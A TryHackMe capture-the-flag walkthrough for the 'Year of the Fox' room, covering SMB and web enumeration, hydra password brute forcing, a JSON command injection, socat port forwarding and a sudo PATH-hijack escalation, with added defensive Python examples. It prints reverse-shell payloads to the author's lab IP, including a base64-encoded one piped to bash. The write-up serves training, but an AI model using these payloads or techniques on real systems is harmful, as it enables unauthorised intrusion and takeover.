Year of the Fox [Tryhackme]
Don’t underestimate the sly old fox || TryHackMe writeup

✔️ Information gathering :
Rustscan :
┌──(root💀kali)-[~]
└─# rustscan -a 10.10.75.135 --ulimit 5000
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Nmap? More like slowmap.🐢
[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.75.135:80
Open 10.10.75.135:139
Open 10.10.75.135:445
At first glance this looks like a Windows machine, because port 445 (SMB) is open: SMB is most often served by Windows hosts. It can also run on Linux (Samba), but port 445 is usually a Windows indicator.
NMAP :
┌──(root💀kali)-[~]
└─# nmap -sC -sV 10.10.75.135 -p 139,445,80
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-05 02:15 EST
Nmap scan report for 10.10.75.135
Host is up (0.31s latency).

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=You want in? Gotta guess the password!
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 401 Unauthorized
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: YEAROFTHEFOX)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: YEAROFTHEFOX)
Service Info: Hosts: year-of-the-fox.lan, YEAR-OF-THE-FOX

Host script results:
|_clock-skew: mean: 3s, deviation: 0s, median: 2s
|_nbstat: NetBIOS name: YEAR-OF-THE-FOX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: year-of-the-fox
| NetBIOS computer name: YEAR-OF-THE-FOX\x00
| Domain name: lan
| FQDN: year-of-the-fox.lan
|_ System time: 2021-12-05T07:15:58+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-12-05T07:15:58
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.40 seconds
Let's enumerate the SMB server first.
SMBCLIENT :
┌──(root💀kali)-[~]
└─# smbclient -L 10.10.75.135
Enter WORKGROUP\root's password:

Sharename Type Comment
--------- ---- -------
yotf Disk Fox's Stuff -- keep out!
IPC$ IPC IPC Service (year-of-the-fox server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
It asked for the workgroup password; I tried a blank password, just a guess, and it worked.
We have a share called yotf. Let's try to log in to the SMB server:
┌──(root💀kali)-[~]
└─# smbclient -U 'guest' \\\\10.10.75.135\\yotf
Enter WORKGROUP\guest's password:
tree connect failed: NT_STATUS_ACCESS_DENIED
We get an access denied error, so we cannot log in as guest. Let's enumerate port 80 next.
PORT 80 : webserver

It is asking for a username and password. I guess they are using HTTP basic authentication, and the request shows the Authorization: Basic header carrying the base64-encoded credentials:
GET / HTTP/1.1
Host: 10.10.75.135
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
I believe we need to guess the username and password. For that, let's go back to SMB; I will use enum4linux.
enum4linux :
S-1-5-21-978893743-2663913856-222388731-1049 *unknown*\*unknown* (8)
S-1-5-21-978893743-2663913856-222388731-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\fox (Local User)
S-1-22-1-1001 Unix User\rascal (Local User)
Possible usernames:
- fox
- rascal
We will try to brute-force the password through web requests. We could also brute-force it against SMB with crackmapexec, but since the same credentials are requested by the web server, I will use hydra against the HTTP basic auth.
Hydra :
┌──(root💀kali)-[~]
└─# hydra -l rascal -P /usr/share/wordlists/rockyou.txt 10.10.75.135 http-get -t 64
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-05 04:19:19
[WARNING] You must supply the web page as an additional option or via -m, default path set to /
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking http-get://10.10.75.135:80/
[80][http-get] host: 10.10.75.135 login: rascal password: underground
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-05 04:20:19
username : rascal
password : underground
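The hydra run above is what the attack looks like from the outside. As an added example (not part of the original writeup), here is what the same minute looks like from the web server's side, and a small detector for it: Apache answers every wrong guess with a 401, so a burst of 401s from one client to the protected path, followed by a 200 from the same client, is the signature to alert on. The log lines are constructed to resemble Apache's combined format; the client addresses, timestamps, threshold and window are assumptions, not values from the room.

```python
"""Detect HTTP basic-auth brute forcing in Apache access logs.

Added example, not part of the original writeup. The log lines are constructed
to resemble Apache's combined format (hydra's http-get module sends one request
per guess); client addresses, timestamps, the threshold and the window are
assumptions, not values from the room.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache "combined" format: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-agent}i".
# Only the fields the detector needs are captured. Note that %u may contain the
# *attempted* username on a 401, which shows which account is being targeted.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)

# Constructed sample: six failed guesses for "rascal" from one client within a
# few seconds, then a 200 from the same client, plus two failures from an
# unrelated client that should not trigger an alert.
SAMPLE_LOG = """\
10.17.9.224 - rascal [05/Dec/2021:04:19:19 -0500] "GET / HTTP/1.0" 401 456 "-" "Mozilla/4.0 (Hydra)"
10.17.9.224 - rascal [05/Dec/2021:04:19:19 -0500] "GET / HTTP/1.0" 401 456 "-" "Mozilla/4.0 (Hydra)"
10.17.9.224 - rascal [05/Dec/2021:04:19:20 -0500] "GET / HTTP/1.0" 401 456 "-" "Mozilla/4.0 (Hydra)"
10.17.9.224 - rascal [05/Dec/2021:04:19:20 -0500] "GET / HTTP/1.0" 401 456 "-" "Mozilla/4.0 (Hydra)"
10.17.9.224 - rascal [05/Dec/2021:04:19:21 -0500] "GET / HTTP/1.0" 401 456 "-" "Mozilla/4.0 (Hydra)"
10.17.9.224 - rascal [05/Dec/2021:04:19:21 -0500] "GET / HTTP/1.0" 401 456 "-" "Mozilla/4.0 (Hydra)"
10.17.9.224 - rascal [05/Dec/2021:04:20:19 -0500] "GET / HTTP/1.0" 200 1234 "-" "Mozilla/4.0 (Hydra)"
10.10.10.5 - - [05/Dec/2021:04:19:30 -0500] "GET / HTTP/1.1" 401 456 "-" "Mozilla/5.0"
10.10.10.5 - - [05/Dec/2021:04:19:45 -0500] "GET / HTTP/1.1" 401 456 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def find_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Flag clients with >= threshold 401s inside a sliding time window, and
    record whether a later 200 from the same client shows the guessing worked."""
    recent = defaultdict(deque)      # ip -> timestamps of 401s inside the window
    alerts = {}                      # ip -> alert dict, one per client
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip = rec["ip"]
        if rec["status"] == 401:
            q = recent[ip]
            q.append(rec["ts"])
            while q and rec["ts"] - q[0] > window:
                q.popleft()
            if ip in alerts:
                alerts[ip]["failures"] += 1
            elif len(q) >= threshold:
                alerts[ip] = {"ip": ip, "first_seen": q[0], "failures": len(q),
                              "target_user": rec["user"], "succeeded_as": None}
        elif rec["status"] == 200 and ip in alerts and alerts[ip]["succeeded_as"] is None:
            alerts[ip]["succeeded_as"] = rec["user"]
    return list(alerts.values())


if __name__ == "__main__":
    for a in find_bruteforce(SAMPLE_LOG.splitlines()):
        print(f"{a['ip']}: {a['failures']} failures since {a['first_seen']}, "
              f"target user {a['target_user']}, success as {a['succeeded_as']}")
```

The window-based count is deliberately per source address rather than per account, because a tool like hydra hits one account from one address at a very high rate; a per-account view would be the complement for slow, distributed guessing. Rate-limiting or fail2ban-style blocking on the same 401 signal is the usual mitigation for a basic-auth login like this one.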
Now let's try to log in to the website.

After typing something random into the search, it did not return anything. I also tried '../', but I think JavaScript blocked the character. Then I typed a single random letter and got some files back. Then I typed . in the search and got this:

I thought these files might be reachable from the web root (/), but there was nothing there. I was confused at this stage; I also ran web directory brute-forcing, but it did not produce anything useful.
┌──(root💀kali)-[~]
└─# dirsearch -u http://10.10.75.135 -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 200

_|. _ _ _ _ _ _|_ v0.4.1
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 200 | Wordlist size: 20475
Output File: /root/.dirsearch/reports/10.10.75.135/_21-12-05_05-24-11.txt
Error Log: /root/.dirsearch/logs/errors-21-12-05_05-24-11.log
Target: http://10.10.75.135/

[05:24:12] Starting:
[05:25:36] 403 - 277B - /server-status
Task Completed
I was clueless; at this point I had tried everything I could think of. Finally I looked for an online writeup and found that there was a command injection vulnerability. I tried a dictionary attack with a special-character wordlist:


I was not able to find a working payload, even after running a Burp Intruder attack with a common command injection payload wordlist. After reading an online writeup I found that these payloads work (they must be placed inside the double quotes of the value in the JSON body):
\";pwd \"
\";pwd\n
✔️ exploitation [initial foothold]
Now I tried to run the following payload:
\";sh -i >& /dev/tcp/10.17.9.224/9001 0>&1\n
and set up my listener on port 9001:
nc -lvnp 9001
But it did not work, and a second payload did not work either. So I believe the server blocks specific strings on the server side. Let's try encoding the payload with base64. We can do that with the base64 command, but because of the special characters in the string I will use CyberChef so that I get a correct base64-encoded string. The payload then needs to be modified like so:
\";echo c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTcuOS4yMjQvOTAwMSAwPiYx|base64 -d |bash\n
The overall body of the request looks like this:
{
"target":"\";echo c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTcuOS4yMjQvOTAwMSAwPiYx|base64 -d |bash\n"
}
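The request body above only works because whatever handles the "target" value builds a shell command out of it, so a double quote closes the quoted argument and a ';' starts a new command. The writeup never shows the room's backend, so as an added example (not the challenge's own code) here is a reconstruction of that injectable pattern next to a hardened handler that validates the term and never touches a shell. Function names, the allowlist and the sample file names are assumptions.

```python
"""An injectable JSON search handler beside a hardened one.

Added example, not the room's own backend. search_vulnerable() shows the usual
shape of the bug; search_hardened() applies an allowlist and does the search
in-process. Function names, the allowlist and the sample file names are
assumptions.
"""
import json
import os
import re
import subprocess
import tempfile


def search_vulnerable(body, base_dir):
    """Injectable pattern: the user-controlled value is interpolated into a
    shell string, so input can close the quotes and append its own command.
    Kept here only to contrast with search_hardened()."""
    target = json.loads(body)["target"]
    cmd = f'find "{base_dir}" -name "*{target}*"'        # quotes can be closed by input
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


# Allowlist for a filename search term: letters, digits, dot, dash, underscore.
SAFE_TERM = re.compile(r"^[A-Za-z0-9._-]{1,64}$")


def search_hardened(body, base_dir):
    """Validated term, no shell: the search is a substring match over os.walk(),
    so the input can only ever be compared with file names. Returns sorted
    paths relative to base_dir; raises ValueError for anything off-allowlist."""
    target = json.loads(body).get("target")
    if not isinstance(target, str) or not SAFE_TERM.match(target):
        raise ValueError("rejected search term")
    hits = []
    for root, _dirs, files in os.walk(base_dir):
        for name in files:
            if target in name:
                hits.append(os.path.relpath(os.path.join(root, name), base_dir))
    return sorted(hits)


def make_sample_share():
    """Create a temporary directory with constructed file names and return its path."""
    d = tempfile.mkdtemp(prefix="yotf-")
    for name in ("fox-notes.txt", "rascal.jpg", "keep-out.txt"):
        open(os.path.join(d, name), "w").close()
    return d


def is_rejected(body, base_dir):
    """True if the hardened handler refuses the body."""
    try:
        search_hardened(body, base_dir)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    share = make_sample_share()
    print(search_hardened('{"target":"fox"}', share))        # ['fox-notes.txt']
    # A body with the same shape as the injection above is refused outright:
    print(is_rejected('{"target":"\\";pwd \\""}', share))   # True
```

The important design point is that the hardened version does not try to blocklist characters (which is what the server's string filtering above attempted, and why base64 got around it); it allowlists what a filename search term can look like and removes the shell from the data path entirely, so there is nothing left to inject into.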
And now we get the connection:

Stabilizing the shell:

Getting the web flag:

✔️ post exploitation :
I did some manual enumeration but did not find anything interesting, so I ran linpeas.sh. First change directory to /dev/shm, make the script executable with chmod +x linpeas.sh, and run it. It shows that port 22 (SSH) is listening locally only:

Let's look at the SSH configuration file /etc/ssh/sshd_config. We see that the user fox is allowed to connect. Now we need to forward this locally listening port so we can reach it from outside; I think we will need to brute-force it. We can use either chisel or socat to forward the port. I will use socat.
socat is not installed on the machine, so we have to download it from the attacking machine using python http.server (make sure you download it into /dev/shm or /tmp). The command to forward the port using socat is:
./socat tcp-listen:8888,reuseaddr,fork tcp:localhost:22
This opens another port (8888 here) and passes its traffic to the locally listening SSH port, so from the outside port 8888 effectively is the SSH port. We can check with nmap whether port 8888 is now open on the target:

As you can see, port 8888 is now open. Let's run a brute-force attack against it with the username fox:

And as you can see, it found the password within 10 seconds. Now let's SSH into the machine:

Now that we are in the system, let's first get the user flag (user-flag.txt).
✔️ privilege escalation
As always, I first run sudo -l to see whether there is anything I can run with sudo, and I found this:

It seems we can run this binary with sudo. But there is one more thing to notice in the output above: no secure_path is defined next to env_reset, mail_badpass, which strongly suggests this has something to do with PATH exploitation.
When secure_path is defined in the sudoers file, commands run as root through sudo use that PATH instead of the caller's; this machine does not have it, so the shutdown binary is suspicious.
Let me download this binary to my Kali machine and analyze it with radare2.

You can see from the image that this binary (shutdown) calls another binary, poweroff, without an absolute path, which gives us a PATH injection vector for privilege escalation.
So we will copy /bin/bash, rename the copy to poweroff, and manipulate the PATH variable so that /tmp is searched first. shutdown will then execute our poweroff, which is actually the bash binary, and we get a shell with elevated privileges.
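The escalation above depends on two separate weaknesses lining up: sudoers without secure_path, and a privileged program calling a helper by bare name. As an added example (not from the writeup or the room), here is a small audit that checks both the way an administrator reviewing this host would: it reads the secure_path setting out of a sudoers fragment and resolves each helper name the way execvp() would under the effective PATH, reporting any that land outside trusted system directories. The sudoers snippets, the caller's PATH and the directory layout are constructed inputs, and resolution runs over that in-memory layout rather than the real filesystem; the function names and trusted directory list are assumptions.

```python
"""Audit sudoers secure_path and PATH resolution of helper commands.

Added example, not from the writeup or the room. The sudoers snippets, the
caller's PATH and the directory layout are constructed inputs; command names
are resolved over that in-memory layout rather than the real filesystem.
Function names and the trusted directory list are assumptions.
"""
import re

SECURE_PATH_RE = re.compile(r'\bsecure_path\s*=\s*"?([^"\s,]+)"?')

# Constructed sudoers fragments: the first mirrors the "sudo -l" output above
# (env_reset and mail_badpass but no secure_path); the second adds it.
SUDOERS_VULN = """\
Defaults env_reset, mail_badpass
fox ALL=(ALL) NOPASSWD: /usr/sbin/shutdown
"""
SUDOERS_FIXED = """\
Defaults env_reset, mail_badpass, secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
fox ALL=(ALL) NOPASSWD: /usr/sbin/shutdown
"""

# Constructed filesystem view: directory -> names of executables in it.
# /tmp holds a user-planted "poweroff", as in the walkthrough.
LAYOUT = {
    "/tmp": {"poweroff"},
    "/sbin": {"poweroff", "shutdown"},
    "/bin": {"bash", "ls"},
}
USER_PATH = "/tmp:/usr/local/bin:/usr/bin:/bin:/sbin"
TRUSTED_DIRS = ("/bin", "/sbin", "/usr/bin", "/usr/sbin", "/usr/local/bin", "/usr/local/sbin")


def get_secure_path(sudoers_text):
    """Return the secure_path value from a Defaults line, or None if absent."""
    for line in sudoers_text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line.startswith("Defaults"):
            m = SECURE_PATH_RE.search(line)
            if m:
                return m.group(1)
    return None


def resolve(command, path, layout):
    """Resolve a command the way execvp() does: a name containing '/' is used
    as given; otherwise PATH entries are searched left to right, first hit wins."""
    if "/" in command:
        return command
    for d in path.split(":"):
        if command in layout.get(d, ()):
            return d.rstrip("/") + "/" + command
    return None


def audit(sudoers_text, user_path, layout, helpers, trusted_dirs=TRUSTED_DIRS):
    """Report whether sudo would keep the caller's PATH, and where each helper
    name the privileged program calls would resolve under the effective PATH."""
    findings = []
    effective = get_secure_path(sudoers_text)
    if effective is None:
        findings.append("sudoers: no secure_path, sudo keeps the caller's PATH")
        effective = user_path
    for h in helpers:
        target = resolve(h, effective, layout)
        if target is None:
            findings.append(f"{h}: not found in PATH")
        elif target.rsplit("/", 1)[0] not in trusted_dirs:
            findings.append(f"{h}: resolves to {target} (outside trusted directories)")
    return findings


if __name__ == "__main__":
    for label, text in (("vulnerable", SUDOERS_VULN), ("fixed", SUDOERS_FIXED)):
        print(label, audit(text, USER_PATH, LAYOUT, ["poweroff"]) or ["clean"])
```

Either fix on its own closes this particular path: restoring secure_path in sudoers makes the audit come back clean even with /tmp first in the caller's PATH, and having the privileged program call /sbin/poweroff by absolute path makes resolve() ignore PATH entirely. Doing both is the usual recommendation, since each one protects against the other being forgotten.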

And see what we have:

Interesting part:

So we can find it like so:
find / -name root.txt -type f 2>/dev/null
But it did not work. After 2–3 attempts, when I ran this:
find / -name *root -type f 2>/dev/null
I got this:


This was quite a hard and unique challenge!
Writeups I used for this are:
https://tryhackme.com/resources/blog/year-of-the-fox-official-write-up
https://h0j3n.medium.com/tryhackme-year-of-the-fox-631c7752fab2
THANK YOU FOR READING MY WRITE UP !! 👊👊
Please support me by following me on Medium: https://surya-dev.medium.com/
You can also subscribe to me on YouTube 🙌, where I post walkthroughs and other ethical hacking videos.